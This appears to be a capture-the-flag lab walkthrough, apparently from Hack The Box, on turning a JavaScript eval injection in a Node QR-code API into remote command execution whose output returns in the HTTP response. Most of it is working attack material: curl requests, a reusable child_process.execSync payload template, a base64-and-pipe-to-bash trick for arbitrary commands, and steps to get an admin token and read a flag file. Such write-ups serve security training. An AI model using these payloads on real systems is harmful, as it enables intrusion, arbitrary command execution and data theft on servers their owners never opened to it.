HTTP Response Injection

Overview

Instead of file-based exfiltration, inject command output directly into the HTTP response.

---

Possible Responses in /generate/

Status	Message	Condition
403	Unauthorized	No auth
403	Invalid input	Non-admin
403	Verbose message	Admin + bad char
500	Could not generate QR code	General errors

Target: Verbose message (403) - only one with user-controlled content.

---

Understanding the Catch Block

try {
  // ...SNIP...
} catch (e) {
  if (e.statusCode === 403) {
    return next(e);  // ← Shows 'e.message'
  } else {
    return next({
      message: "Could not generate QR code.",
      statusCode: 500,  // ← Static message
    });
  }
}

Key Insight

To get custom message displayed:

• Must have statusCode === 403

• Our injection was missing statusCode!

---

Controlling the Response

Test Payload

{
  "text": "test message', statusCode: 403})//"
}

Result

curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <TOKEN>" \
  -d "{ \"text\": \"test message', statusCode: 403})//\" }" \
  http://localhost:5000/api/service/generate

Response:

{"message":"The input \"test message"}

✅ Custom message displayed!

---

Injecting Command Output

Original onError String

throw({message: 'The input ";" contains the following invalid characters: [;]', statusCode: 403})

After Injection

throw({message: 'The input "test message', statusCode: 403})//" contains...

Adding Command Execution

Goal: Replace test message with command output.

Payload Structure

' + require('child_process').execSync('COMMAND').toString() + `'`, statusCode: 403})//

Full Payload

{
  "text": "' + require('child_process').execSync('ls').toString() + `'`, statusCode: 403})//"
}

Final eval String

throw({message: 'The input "' + require('child_process').execSync('ls').toString() + `'`, statusCode: 403})//" contains...

---

Testing the Payload

curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <TOKEN>" \
  -d "{ \"text\": \"' + require('child_process').execSync('ls').toString() + \`'\`, statusCode: 403})//\" }" \
  http://localhost:5000/api/service/generate

Response:

{"message":"The input \"node_modules\npackage-lock.json\npackage.json\nsrc\n'"}

✅ Command output in HTTP response!

---

Why Backticks?

Problem

Multiple quote types in payload:

• JSON uses "

• JavaScript string uses '

• Need another quote type

Solution

Use backticks ` for the final quote:

+ `'`

This avoids escaping hell in JSON/curl.

---

Practical Exploitation

Step 1: Get Admin Token

curl -s -X POST \
  -H "Content-Type: application/json" \
  -d '{"email": "test@hackthebox.com"}' \
  http://<TARGET>/api/auth/authenticate

Step 2: Find the Flag

Base64 encode the find command:

echo 'find / -name flag.txt 2>/dev/null' | base64 -w0
# ZmluZCAvIC1uYW1lIGZsYWcudHh0IDI+L2Rldi9udWxsCg==

Execute via injection:

curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <TOKEN>" \
  -d "{ \"text\": \"' + require('child_process').execSync('echo ZmluZCAvIC1uYW1lIGZsYWcudHh0IDI+L2Rldi9udWxsCg== | base64 -d | bash').toString() + \`'\`, statusCode: 403})//\" }" \
  http://<TARGET>/api/service/generate

Response:

{"message":"The input \"/opt/flag.txt\n'"}

Step 3: Read the Flag

curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <TOKEN>" \
  -d "{ \"text\": \"' + require('child_process').execSync('cat /opt/flag.txt').toString() + \`'\`, statusCode: 403})//\" }" \
  http://<TARGET>/api/service/generate

Response:

{"message":"The input \"FLAG_CONTENTS\n'"}

---

Payload Template

Generic Form

{
  "text": "' + require('child_process').execSync('COMMAND').toString() + `'`, statusCode: 403})//"
}

With Base64 (for complex commands)

{
  "text": "' + require('child_process').execSync('echo BASE64 | base64 -d | bash').toString() + `'`, statusCode: 403})//"
}

---

Why Base64?

Problems Without Encoding

Issue	Example
Quotes break JSON	cat "file"
Spaces in paths	cat /path with spaces/
Special chars	grep -E "pattern"
Pipes/redirects	`cmd1

Solution

# Encode
echo 'complex command | with pipes > and redirects' | base64 -w0

# Execute
echo <base64> | base64 -d | bash

---

Comparison: Methods

Method	Pros	Cons
Console log	Simple	Local only
File write	Persistent	Need read access
Webshell	Full control	Modifies app
HTTP response	No file changes	Limited output length

---

Updated Checklist

#	Step	Status
1-7	Previous steps	✅
8	Reach command execution	✅
9	Blindly verify execution	✅
10	Automate exploitation	⏳

---

Key Takeaways

1. Understand response logic - Know what controls output

2. statusCode matters - Must be 403 to show message

3. Quote management - Use backticks to avoid escaping

4. Base64 encoding - Essential for complex commands

5. Response injection - Cleaner than file-based methods